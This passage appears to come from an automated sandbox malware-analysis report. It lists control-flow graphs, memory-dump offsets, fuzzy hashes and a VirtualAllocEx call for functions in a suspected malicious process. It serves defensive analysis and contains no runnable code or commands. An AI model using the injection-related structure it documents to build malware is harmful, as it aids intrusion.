                                                control_flow_graph 911 3846f0-384718 912 38471a 911->912 913 38471f-38476a 911->913 912->913 915 38476c 913->915 916 384771-384795 913->916 915->916 917 38479c-3847c0 916->917 918 384797 916->918 919 3847c2 917->919 920 3847c7-3847eb 917->920 918->917 919->920 921 3847ed 920->921 922 3847f2-38480c 920->922 921->922 923 38480e 922->923 924 384813-384863 call 380140 922->924 923->924 928 38486a-384884 924->928 929 384865 924->929 930 38488b-3848a2 928->930 931 384886 928->931 929->928 932 3848a9-3848c0 930->932 933 3848a4 930->933 931->930 934 3848c2 932->934 935 3848c7-3848e8 932->935 933->932 934->935 936 3848ea 935->936 937 3848ef-384909 935->937 936->937 938 38490b 937->938 939 384910-384927 937->939 938->939 940 384929 939->940 941 38492e-38494f 939->941 940->941 942 384951 941->942 943 384956-384970 941->943 942->943 944 384972 943->944 945 384977-384998 943->945 944->945 946 38499a 945->946 947 38499f-3849c3 945->947 946->947 948 3849ca-3849e4 947->948 949 3849c5 947->949 950 3849eb-384a02 948->950 951 3849e6 948->951 949->948 952 384a09-384a2a 950->952 953 384a04 950->953 951->950 954 384a2c 952->954 955 384a31-384a4b 952->955 953->952 954->955 956 384a4d 955->956 957 384a52-384a73 955->957 956->957 958 384a7a-384a9e 957->958 959 384a75 957->959 960 384aa0 958->960 961 384aa5-384abf 958->961 959->958 960->961 962 384ac1 961->962 963 384ac6-384ae7 961->963 962->963 964 384ae9 963->964 965 384aee-384b68 call 380140 call 384c02 call 38075c 963->965 964->965 973 384b6a-384b6e 965->973 974 384b77-384b7b 965->974 975 384b70 973->975 976 384b75 973->976 977 384b7d 974->977 978 384b82-384bbb 974->978 975->976 976->978 977->978 985 384bbe call 384fc8 978->985 986 384bbe call 384fc1 978->986 980 384bc0-384bf2 985->980 986->980
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 93d76d9c57d238b86c365fe788963b0a948b4fe39c013001153f2e0893d92ad5
                                                • Instruction ID: e460d960cec070f2c40141b85c39bf21fb57491f0b5c5a824c118bca29200428
                                                • Opcode Fuzzy Hash: 93d76d9c57d238b86c365fe788963b0a948b4fe39c013001153f2e0893d92ad5
                                                • Instruction Fuzzy Hash: 31F11530A002598FEB54DFA9C440B9EFBB2EF48300F25C5AAD409EB656D738D981CF95
                                                Function 00387EC0 Relevance: .3, Instructions: 333COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 987 387ec0-387ee8 988 387eea 987->988 989 387eef-387f3a 987->989 988->989 991 387f3c 989->991 992 387f41-387f5b 989->992 991->992 993 387f5d 992->993 994 387f62-387f79 992->994 993->994 995 387f7b 994->995 996 387f80-387f97 994->996 995->996 997 387f99 996->997 998 387f9e-387fb5 996->998 997->998 999 387fbc-387ff8 call 380140 998->999 1000 387fb7 998->1000 1004 387ffa 999->1004 1005 387fff-388016 999->1005 1000->999 1004->1005 1006 388018 1005->1006 1007 38801d-388034 1005->1007 1006->1007 1008 38803b-388052 1007->1008 1009 388036 1007->1009 1010 388059-38807a 1008->1010 1011 388054 1008->1011 1009->1008 1012 38807c 1010->1012 1013 388081-38809b 1010->1013 1011->1010 1012->1013 1014 38809d 1013->1014 1015 3880a2-3880c3 1013->1015 1014->1015 1016 3880ca-3880e4 1015->1016 1017 3880c5 1015->1017 1018 3880eb-38810c 1016->1018 1019 3880e6 1016->1019 1017->1016 1020 38810e 1018->1020 1021 388113-388137 1018->1021 1019->1018 1020->1021 1022 388139 1021->1022 1023 38813e-388158 1021->1023 1022->1023 1024 38815a 1023->1024 1025 38815f-388180 1023->1025 1024->1025 1026 388182 1025->1026 1027 388187-3881ab 1025->1027 1026->1027 1028 3881ad 1027->1028 1029 3881b2-3881cc 1027->1029 1028->1029 1030 3881ce 1029->1030 1031 3881d3-3881ea 1029->1031 1030->1031 1032 3881ec 1031->1032 1033 3881f1-388212 1031->1033 1032->1033 1034 388219-388233 1033->1034 1035 388214 1033->1035 1036 38823a-388251 1034->1036 1037 388235 1034->1037 1035->1034 1038 388258-38827b 1036->1038 1039 388253 1036->1039 1037->1036 1040 38827d 1038->1040 1041 388282-3882ea call 380140 call 38075c 1038->1041 1039->1038 1040->1041 1049 3882f9-3882fd 1041->1049 1050 3882ec-3882f0 1041->1050 1053 3882ff 1049->1053 1054 388304-38833d 1049->1054 1051 3882f2 1050->1051 1052 3882f7 1050->1052 1051->1052 1052->1054 1053->1054 1060 388340 call 384fc8 1054->1060 1061 388340 call 384fc1 1054->1061 1056 388342-388374 1060->1056 1061->1056
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 813eb00a0210b2cce743193410cdf66381e3619db7604f3b8890daf106ab59a3
                                                • Instruction ID: c42b0273e8c51ec3ded1a44710a95d3b8cae6c6689da5a28945e75b0f71ab3e9
                                                • Opcode Fuzzy Hash: 813eb00a0210b2cce743193410cdf66381e3619db7604f3b8890daf106ab59a3
                                                • Instruction Fuzzy Hash: C2E12570A002588FEB50DFA9C44078EFBB2FF88301F65C5A9D409EB652DB38D981CB95
                                                Function 0038180F Relevance: .2, Instructions: 249COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e114e76cfe998b300293ce7e8f92e3e800c33c6c620e09f2f7144f2a3329d018
                                                • Instruction ID: dec6986f0a9cd4350f24dc128839f9c780decd683f8a9eaa2642ad0eb04717b2
                                                • Opcode Fuzzy Hash: e114e76cfe998b300293ce7e8f92e3e800c33c6c620e09f2f7144f2a3329d018
                                                • Instruction Fuzzy Hash: 40B1E174E002188FDB54DFA9C884B9EFBB6BF89300F2481AAD419A7355DB349986CF51
                                                Function 00381589 Relevance: .2, Instructions: 185COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6cc5cb11ced29c36a40a1d340e71e6a9af247de86d18ecf65dfab30df1f4e335
                                                • Instruction ID: 3ab67735869e9ffb36605f884ad5c5241ea7579d3a316a7a3efcbb21ae5bd269
                                                • Opcode Fuzzy Hash: 6cc5cb11ced29c36a40a1d340e71e6a9af247de86d18ecf65dfab30df1f4e335
                                                • Instruction Fuzzy Hash: E4819774E00218CFDB58DFBAD895A9DBBF2BF89300F14806AE419AB355DB34A945CF50
                                                Function 00381071 Relevance: .1, Instructions: 135COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 657a76937df22f5fa7cad9519b2b0ebe290322e4fc62aedc6353b5525caf22d7
                                                • Instruction ID: ce4c149e6d7b194a35af16668ee8653070df0a4e6d894a6caed3030e4915b1e4
                                                • Opcode Fuzzy Hash: 657a76937df22f5fa7cad9519b2b0ebe290322e4fc62aedc6353b5525caf22d7
                                                • Instruction Fuzzy Hash: AB514834E002858FE741DFA9C54469EFBF2EF49301F29C5A5C408EB266D738D942CBA1
                                                Function 003851F8 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 554 3851f8-3852b2 VirtualAllocEx 557 3852bb-385305 554->557 558 3852b4-3852ba 554->558 558->557
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 003852A2
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 6174fb91d1e8b2bacc31ac6c6288c37dae5a5adc4f2efacb4bfaf9ffb2b6a39e
                                                • Instruction ID: 3f125f76e209086db6d694dfb7d9e6ed8084cd2045d82292931e773d31127a18
                                                • Opcode Fuzzy Hash: 6174fb91d1e8b2bacc31ac6c6288c37dae5a5adc4f2efacb4bfaf9ffb2b6a39e
                                                • Instruction Fuzzy Hash: 2D3187B9D002589FCF10CFA9D985ADEFBB5BB49310F20942AE815B7310D735A945CF64